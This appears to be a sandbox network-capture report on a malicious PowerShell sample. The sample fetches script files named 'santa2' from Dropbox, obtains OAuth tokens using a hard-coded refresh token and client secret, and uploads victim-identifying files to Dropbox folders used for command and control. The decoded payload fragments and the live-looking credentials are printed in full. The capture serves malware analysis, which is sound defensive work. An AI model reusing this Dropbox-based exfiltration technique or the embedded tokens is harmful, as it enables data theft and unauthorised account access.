Nov 27, 2024 08:29:05.229931116 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.229979038 CET | 443 | 49730 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.230022907 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:05.274154902 CET | 49730 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:05.352643013 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:05.395354986 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:05.753748894 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:05.753803968 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:05.753853083 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:05.755234957 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:05.755248070 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:06.235811949 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:06.235833883 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:06.236028910 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:06.236073971 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:06.236319065 CET | 443 | 49731 | 162.125.65.15 | 192.168.2.4
Nov 27, 2024 08:29:06.236447096 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:06.245289087 CET | 49731 | 443 | 192.168.2.4 | 162.125.65.15
Nov 27, 2024 08:29:06.280504942 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:06.280575037 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:06.280647039 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:06.281286001 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:06.281300068 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.224360943 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.224457026 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.225110054 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.225332975 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.227943897 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.227961063 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.228250027 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.229156017 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.271393061 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.271467924 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.271508932 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.742939949 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.743016958 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.743603945 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.745322943 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.746465921 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.746478081 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.746680021 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.747519016 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.795337915 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.795404911 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.795419931 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.977866888 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.977926016 CET | 443 | 49732 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:07.978188038 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:07.978622913 CET | 49732 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:08.499633074 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:08.499696016 CET | 443 | 49733 | 162.125.69.19 | 192.168.2.4
Nov 27, 2024 08:29:08.499789953 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:08.500458002 CET | 49733 | 443 | 192.168.2.4 | 162.125.69.19
Nov 27, 2024 08:29:08.635111094 CET | 49734 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:08.635165930 CET | 443 | 49734 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:08.635385036 CET | 49734 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:08.654798031 CET | 49734 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:08.654815912 CET | 443 | 49734 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:09.401570082 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:09.401614904 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:09.401689053 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:09.466916084 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:09.466931105 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.171019077 CET | 443 | 49734 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.171241045 CET | 49734 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.173059940 CET | 49734 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.173074007 CET | 443 | 49734 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.173347950 CET | 443 | 49734 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.174166918 CET | 49734 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.215362072 CET | 443 | 49734 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.217411041 CET | 49734 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.217422009 CET | 443 | 49734 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.884778976 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.885019064 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.886832952 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.886848927 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.887092113 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.888051987 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.888863087 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.888895035 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.889003038 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.889041901 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:10.889106035 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:10.889116049 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:11.519656897 CET | 443 | 49734 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:11.519725084 CET | 443 | 49734 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:11.519803047 CET | 49734 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:11.520301104 CET | 49734 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:12.574050903 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:12.574110985 CET | 443 | 49735 | 162.125.69.14 | 192.168.2.4
Nov 27, 2024 08:29:12.574156046 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Nov 27, 2024 08:29:12.574739933 CET | 49735 | 443 | 192.168.2.4 | 162.125.69.14
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 08:29:02.171025038 CET | 64541 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 08:29:02.557193995 CET | 53 | 64541 | 1.1.1.1 | 192.168.2.4
Nov 27, 2024 08:29:05.379278898 CET | 53795 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 08:29:05.752635002 CET | 53 | 53795 | 1.1.1.1 | 192.168.2.4
Nov 27, 2024 08:29:08.260850906 CET | 56884 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 08:29:08.634126902 CET | 53 | 56884 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 27, 2024 08:29:02.171025038 CET | 192.168.2.4 | 1.1.1.1 | 0x8897 | Standard query (0) | dl.dropboxusercontent.com | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:29:05.379278898 CET | 192.168.2.4 | 1.1.1.1 | 0x78ca | Standard query (0) | api.dropboxapi.com | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:29:08.260850906 CET | 192.168.2.4 | 1.1.1.1 | 0xb5f9 | Standard query (0) | content.dropboxapi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 27, 2024 08:29:02.557193995 CET | 1.1.1.1 | 192.168.2.4 | 0x8897 | No error (0) | dl.dropboxusercontent.com | edge-block-www-env.dropbox-dns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 08:29:02.557193995 CET | 1.1.1.1 | 192.168.2.4 | 0x8897 | No error (0) | edge-block-www-env.dropbox-dns.com |  | 162.125.65.15 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:29:05.752635002 CET | 1.1.1.1 | 192.168.2.4 | 0x78ca | No error (0) | api.dropboxapi.com | api.dropbox.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 08:29:05.752635002 CET | 1.1.1.1 | 192.168.2.4 | 0x78ca | No error (0) | api.dropbox.com | api-env.dropbox-dns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 08:29:05.752635002 CET | 1.1.1.1 | 192.168.2.4 | 0x78ca | No error (0) | api-env.dropbox-dns.com |  | 162.125.69.19 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:29:08.634126902 CET | 1.1.1.1 | 192.168.2.4 | 0xb5f9 | No error (0) | content.dropboxapi.com | edge-block-api-env.dropbox-dns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 08:29:08.634126902 CET | 1.1.1.1 | 192.168.2.4 | 0xb5f9 | No error (0) | edge-block-api-env.dropbox-dns.com |  | 162.125.69.14 | A (IP address) | IN (0x0001) | false
• dl.dropboxusercontent.com
• api.dropboxapi.com
• content.dropboxapi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 162.125.65.15 | 443 | 2124 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-27 07:29:04 UTC | 260 | OUT | GET /scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiym6s9y2h&st=727cs1mx&dl=0 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: dl.dropboxusercontent.com
    Connection: Keep-Alive
2024-11-27 07:29:05 UTC | 1108 | IN | HTTP/1.1 200 OK
    Content-Type: text/plain; charset=utf-8
    Accept-Ranges: bytes
    Cache-Control: max-age=60
    Content-Disposition: inline; filename="santa2-x.txt"; filename*=UTF-8''santa2-x.txt
    Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=blockserver-usercontent ; sandbox allow-forms allow-scripts allow-top-navigation allow-popups
    Content-Security-Policy: form-action 'none' ; report-uri https://www.dropbox.com/csp_log?policy_name=blockserver-noscript ; script-src 'none'
    Etag: 1730966739663276n
    Pragma: public
    Set-Cookie: uc_session=eIJrvqPCrUqOF87Yo3n1JMNjGY3lcBncJmHLj34ZvyWkBpNllHjVCg65pZiQQQiA; Domain=dropboxusercontent.com; HttpOnly; Path=/; SameSite=None; Secure
    X-Content-Type-Options: nosniff
    X-Server-Response-Time: 565
    Date: Wed, 27 Nov 2024 07:29:04 GMT
    Server: envoy
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-Robots-Tag: noindex, nofollow, noimageindex
    Content-Length: 1532
    Vary: Accept-Encoding
    X-Dropbox-Response-Origin: far_remote
    X-Dropbox-Request-Id: 3c3b89c8d71b499fa0d0d38241be968f
                                                                                                                            Connection: close
                                                                                                                            2024-11-27 07:29:05 UTC1532INData Raw: 24 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 20 3d 20 24 65 6e 76 3a 41 70 70 44 61 74 61 3b 0d 0a 0d 0a 24 74 6f 6b 65 6e 52 65 71 75 65 73 74 50 61 72 61 6d 73 20 3d 20 40 7b 0d 0a 20 20 20 20 67 72 61 6e 74 5f 74 79 70 65 20 20 20 20 3d 20 22 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 22 0d 0a 20 20 20 20 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 20 3d 20 22 43 78 52 37 36 46 41 70 32 4a 41 41 41 41 41 41 41 41 41 41 41 59 63 2d 5a 36 45 45 55 6d 31 73 43 6b 49 6e 5a 6e 43 73 48 52 51 4b 43 70 35 6c 4f 53 4b 42 4d 69 70 43 45 75 64 6e 67 63 2d 6c 22 3b 0d 0a 20 20 20 20 63 6c 69 65 6e 74 5f 69 64 20 20 20 20 20 3d 20 20 22 38 61 7a 71 73 72 67 78 73 64 38 66 77 72 67 22 0d 0a
                                                                                                                            Data Ascii: $ttttttttttttttttttttttpppppppppppppppppppp = $env:AppData;$tokenRequestParams = @{ grant_type = "refresh_token" refresh_token = "CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l"; client_id = "8azqsrgxsd8fwrg"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49731        162.125.65.154  443               5480  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-27 07:29:05 UTC  260                OUT        GET /scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azk5awy5s9&st=yvqqfdfy&dl=0 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: dl.dropboxusercontent.com
    Connection: Keep-Alive
2024-11-27 07:29:06 UTC  1108               IN         HTTP/1.1 200 OK
    Content-Type: text/plain; charset=utf-8
    Accept-Ranges: bytes
    Cache-Control: max-age=60
    Content-Disposition: inline; filename="santa2-f.txt"; filename*=UTF-8''santa2-f.txt
    Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=blockserver-usercontent ; sandbox allow-forms allow-scripts allow-top-navigation allow-popups
    Content-Security-Policy: form-action 'none' ; report-uri https://www.dropbox.com/csp_log?policy_name=blockserver-noscript ; script-src 'none'
    Etag: 1730966741353279n
    Pragma: public
    Set-Cookie: uc_session=8ymvPUwVcX5hBOFXdt81mFUbgqLKLXt9bgdwlnrtN4gfOt3Oj3B29UbkNayuY1jg; Domain=dropboxusercontent.com; HttpOnly; Path=/; SameSite=None; Secure
    X-Content-Type-Options: nosniff
    X-Server-Response-Time: 368
    Date: Wed, 27 Nov 2024 07:29:05 GMT
    Server: envoy
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-Robots-Tag: noindex, nofollow, noimageindex
    Content-Length: 2318
    Vary: Accept-Encoding
    X-Dropbox-Response-Origin: far_remote
    X-Dropbox-Request-Id: e0a0112e9f3d496cad6b4e20b22e3e31
    Connection: close
2024-11-27 07:29:06 UTC  2318               IN         Data Raw: 0d 0a 24 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 74 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 20 3d 20 24 65 6e 76 3a 41 70 70 44 61 74 61 3b 0d 0a 0d 0a 24 74 6f 6b 65 6e 52 65 71 75 65 73 74 50 61 72 61 6d 73 20 3d 20 40 7b 0d 0a 20 20 20 20 67 72 61 6e 74 5f 74 79 70 65 20 20 20 20 3d 20 22 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 22 0d 0a 20 20 20 20 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 20 3d 20 22 43 78 52 37 36 46 41 70 32 4a 41 41 41 41 41 41 41 41 41 41 41 59 63 2d 5a 36 45 45 55 6d 31 73 43 6b 49 6e 5a 6e 43 73 48 52 51 4b 43 70 35 6c 4f 53 4b 42 4d 69 70 43 45 75 64 6e 67 63 2d 6c 22 3b 0d 0a 20 20 20 20 63 6c 69 65 6e 74 5f 69 64 20 20 20 20 20 3d 20 20 22 38 61 7a 71 73 72 67 78 73 64 38 66 77 72 67 22
    Data Ascii: $ttttttttttttttttttttttpppppppppppppppppppp = $env:AppData;$tokenRequestParams = @{ grant_type = "refresh_token" refresh_token = "CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l"; client_id = "8azqsrgxsd8fwrg"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49732        162.125.69.19   443               2124  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-27 07:29:07 UTC  246                OUT        POST /oauth2/token HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Content-Type: application/x-www-form-urlencoded
    Host: api.dropboxapi.com
    Content-Length: 159
    Connection: Keep-Alive
2024-11-27 07:29:07 UTC  159                OUT        Data Raw: 67 72 61 6e 74 5f 74 79 70 65 3d 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 26 63 6c 69 65 6e 74 5f 69 64 3d 38 61 7a 71 73 72 67 78 73 64 38 66 77 72 67 26 63 6c 69 65 6e 74 5f 73 65 63 72 65 74 3d 6a 6a 61 71 76 38 35 62 6d 6b 6e 72 37 73 74 26 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 3d 43 78 52 37 36 46 41 70 32 4a 41 41 41 41 41 41 41 41 41 41 41 59 63 2d 5a 36 45 45 55 6d 31 73 43 6b 49 6e 5a 6e 43 73 48 52 51 4b 43 70 35 6c 4f 53 4b 42 4d 69 70 43 45 75 64 6e 67 63 2d 6c
    Data Ascii: grant_type=refresh_token&client_id=8azqsrgxsd8fwrg&client_secret=jjaqv85bmknr7st&refresh_token=CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l
2024-11-27 07:29:07 UTC  433                IN         HTTP/1.1 200 OK
    Content-Type: application/json
    Cache-Control: no-cache, no-store, must-revalidate
    Expires: 0
    Pragma: no-cache
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-Server-Response-Time: 26
    Date: Wed, 27 Nov 2024 07:29:07 GMT
    Server: envoy
    Content-Length: 208
    Vary: Accept-Encoding
    X-Dropbox-Response-Origin: far_remote
    X-Dropbox-Request-Id: db67f2f6ee7d4c6d8da9bd9976c0403e
    Connection: close
2024-11-27 07:29:07 UTC  208                IN         Data Raw: 7b 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 3a 20 22 73 6c 2e 43 42 64 72 68 74 41 32 69 37 4d 41 4e 49 70 77 36 4c 56 30 35 63 70 53 4f 6f 4c 64 76 38 4c 76 6e 6f 59 39 56 6b 47 46 67 37 59 6c 42 62 37 37 67 51 72 4d 63 73 46 39 6d 35 35 54 62 4f 61 66 6f 56 54 76 38 6e 61 43 6a 55 62 56 77 74 78 63 37 6a 62 58 6f 75 54 65 55 33 4b 38 68 45 74 6a 37 76 42 58 66 57 42 36 62 6d 63 43 73 35 67 79 61 72 41 44 39 51 51 4d 30 62 78 33 36 4a 32 59 38 4b 30 33 50 6e 2d 6b 6e 36 72 53 22 2c 20 22 74 6f 6b 65 6e 5f 74 79 70 65 22 3a 20 22 62 65 61 72 65 72 22 2c 20 22 65 78 70 69 72 65 73 5f 69 6e 22 3a 20 31 34 34 30 30 7d
    Data Ascii: {"access_token": "sl.CBdrhtA2i7MANIpw6LV05cpSOoLdv8LvnoY9VkGFg7YlBb77gQrMcsF9m55TbOafoVTv8naCjUbVwtxc7jbXouTeU3K8hEtj7vBXfWB6bmcCs5gyarAD9QQM0bx36J2Y8K03Pn-kn6rS", "token_type": "bearer", "expires_in": 14400}


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49733        162.125.69.19   443               5480  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-27 07:29:07 UTC  246                OUT        POST /oauth2/token HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Content-Type: application/x-www-form-urlencoded
    Host: api.dropboxapi.com
    Content-Length: 159
    Connection: Keep-Alive
2024-11-27 07:29:07 UTC  159                OUT        Data Raw: 67 72 61 6e 74 5f 74 79 70 65 3d 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 26 63 6c 69 65 6e 74 5f 69 64 3d 38 61 7a 71 73 72 67 78 73 64 38 66 77 72 67 26 63 6c 69 65 6e 74 5f 73 65 63 72 65 74 3d 6a 6a 61 71 76 38 35 62 6d 6b 6e 72 37 73 74 26 72 65 66 72 65 73 68 5f 74 6f 6b 65 6e 3d 43 78 52 37 36 46 41 70 32 4a 41 41 41 41 41 41 41 41 41 41 41 59 63 2d 5a 36 45 45 55 6d 31 73 43 6b 49 6e 5a 6e 43 73 48 52 51 4b 43 70 35 6c 4f 53 4b 42 4d 69 70 43 45 75 64 6e 67 63 2d 6c
    Data Ascii: grant_type=refresh_token&client_id=8azqsrgxsd8fwrg&client_secret=jjaqv85bmknr7st&refresh_token=CxR76FAp2JAAAAAAAAAAAYc-Z6EEUm1sCkInZnCsHRQKCp5lOSKBMipCEudngc-l
2024-11-27 07:29:08 UTC  433                IN         HTTP/1.1 200 OK
    Content-Type: application/json
    Cache-Control: no-cache, no-store, must-revalidate
    Expires: 0
    Pragma: no-cache
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-Server-Response-Time: 21
    Date: Wed, 27 Nov 2024 07:29:07 GMT
    Server: envoy
    Content-Length: 208
    Vary: Accept-Encoding
    X-Dropbox-Response-Origin: far_remote
    X-Dropbox-Request-Id: 231300aea2264a9bbb2f695e3d04ecc2
    Connection: close
2024-11-27 07:29:08 UTC  208                IN         Data Raw: 7b 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 3a 20 22 73 6c 2e 43 42 66 6d 34 6a 62 41 65 36 50 61 45 4d 2d 58 5f 57 42 30 61 79 36 76 48 6b 6e 45 70 63 66 74 75 43 77 75 35 52 6f 6a 72 4a 55 43 51 46 47 54 4c 33 48 37 47 6e 73 75 70 75 78 77 30 56 53 34 36 33 73 6e 5f 63 47 30 34 77 7a 37 71 4d 72 48 4f 56 74 73 79 42 4e 5f 79 52 73 66 55 6e 75 38 49 32 42 52 6e 79 74 37 57 71 38 41 6e 52 2d 51 49 66 61 58 65 70 50 4d 75 6f 31 4e 6b 35 30 68 57 6b 35 38 35 62 62 78 4a 76 4a 67 22 2c 20 22 74 6f 6b 65 6e 5f 74 79 70 65 22 3a 20 22 62 65 61 72 65 72 22 2c 20 22 65 78 70 69 72 65 73 5f 69 6e 22 3a 20 31 34 34 30 30 7d
    Data Ascii: {"access_token": "sl.CBfm4jbAe6PaEM-X_WB0ay6vHknEpcftuCwu5RojrJUCQFGTL3H7Gnsupuxw0VS463sn_cG04wz7qMrHOVtsyBN_yRsfUnu8I2BRnyt7Wq8AnR-QIfaXepPMuo1Nk50hWk585bbxJvJg", "token_type": "bearer", "expires_in": 14400}


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49734        162.125.69.14   443               2124  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-27 07:29:10 UTC  551                OUT        POST /2/files/upload HTTP/1.1
    Authorization: Bearer sl.CBdrhtA2i7MANIpw6LV05cpSOoLdv8LvnoY9VkGFg7YlBb77gQrMcsF9m55TbOafoVTv8naCjUbVwtxc7jbXouTeU3K8hEtj7vBXfWB6bmcCs5gyarAD9QQM0bx36J2Y8K03Pn-kn6rS
    Dropbox-API-Arg: { "path": "/githut/santa2_persist/192.168.2.4-1127_0234-XXX-santa2.txt", "mode": "add", "autorename": true, "mute": false }
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: content.dropboxapi.com
    Content-Length: 14
    Connection: Keep-Alive
2024-11-27 07:29:10 UTC  14                 OUT        Data Raw: ff fe 78 00 6d 00 69 00 6c 00 0d 00 0a 00
    Data Ascii: xmil
2024-11-27 07:29:11 UTC  468                IN         HTTP/1.1 200 OK
    Content-Type: application/json
    Cache-Control: no-cache
    X-Content-Type-Options: nosniff
    X-Server-Response-Time: 626
    Date: Wed, 27 Nov 2024 07:29:11 GMT
    Server: envoy
    Content-Length: 488
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-Robots-Tag: noindex, nofollow, noimageindex
    Vary: Accept-Encoding
    X-Dropbox-Response-Origin: far_remote
    X-Dropbox-Request-Id: ce9a083d49864cccbf89208e89a74b08
    Connection: close
2024-11-27 07:29:11 UTC  488                IN         Data Raw: 7b 22 6e 61 6d 65 22 3a 20 22 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 58 58 58 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 70 61 74 68 5f 6c 6f 77 65 72 22 3a 20 22 2f 67 69 74 68 75 74 2f 73 61 6e 74 61 32 5f 70 65 72 73 69 73 74 2f 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 78 78 78 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 2f 67 69 74 68 75 74 2f 73 61 6e 74 61 32 5f 70 65 72 73 69 73 74 2f 31 39 32 2e 31 36 38 2e 32 2e 34 2d 31 31 32 37 5f 30 32 33 34 2d 58 58 58 2d 73 61 6e 74 61 32 2e 74 78 74 22 2c 20 22 69 64 22 3a 20 22 69 64 3a 77 54 5f 45 46 74 4e 6c 6f 4a 45 41 41 41 41 41 41 41 41 58 79 41 22 2c 20 22 63 6c 69 65 6e 74 5f 6d 6f 64 69 66 69 65
    Data Ascii: {"name": "192.168.2.4-1127_0234-XXX-santa2.txt", "path_lower": "/githut/santa2_persist/192.168.2.4-1127_0234-xxx-santa2.txt", "path_display": "/githut/santa2_persist/192.168.2.4-1127_0234-XXX-santa2.txt", "id": "id:wT_EFtNloJEAAAAAAAAXyA", "client_modifie


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49735        162.125.69.14   443               5480  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-27 07:29:10 UTC  552                OUT        POST /2/files/upload HTTP/1.1
    Authorization: Bearer sl.CBfm4jbAe6PaEM-X_WB0ay6vHknEpcftuCwu5RojrJUCQFGTL3H7Gnsupuxw0VS463sn_cG04wz7qMrHOVtsyBN_yRsfUnu8I2BRnyt7Wq8AnR-QIfaXepPMuo1Nk50hWk585bbxJvJg
    Dropbox-API-Arg: { "path": "/github/santa2_first/192.168.2.4-1127_0234-RRR-santa2.txt", "mode": "add", "autorename": true, "mute": false }
    Content-Type: application/octet-stream
